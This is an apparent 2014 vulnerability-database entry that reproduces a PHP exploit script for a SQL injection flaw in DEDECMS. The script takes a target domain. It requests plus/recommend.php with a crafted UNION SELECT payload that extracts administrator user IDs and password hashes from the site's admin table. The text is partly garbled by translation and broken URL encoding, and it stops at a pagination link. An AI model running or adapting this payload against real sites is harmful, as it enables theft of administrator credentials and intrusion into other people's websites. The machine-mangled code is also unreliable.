DEDECMS full version disregard for GPC injection exp-vulnerability warning-the black bar safety net

2014-03-10T00:00:00
ID MYHACK58:62201442910
Type myhack58
Reporter 佚名
Modified 2014-03-10T00:00:00

Description

<? php

print_r(

"

+------------------------------------+

DEDECMS full version disregard for GPC injection

code by :Sunshie

Usage:$argv[0] <domain>

Example: php.exe$argv[0] www.phpinfo.me

+------------------------------------+

"

);

if($argv[1]==""){

exit("do not tease than we're still good friends");

}else{

$sb=$argv[1];

echo"Explot....\ n";

$exp=@file_get_contents("http://$sb//plus/recommend. php? aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\'and+char(@`)+/*! 50000Union*/+/*! 50000SeLect*/+1,2,3,concat(0x3C6162633E,group_concat(0x7C,userid,0x3a,pwd,0x7C),0x3C2F6162633E),5,6,7,8,9%20from%2 0%2 3@__admin`%2 3");

[1] [2] next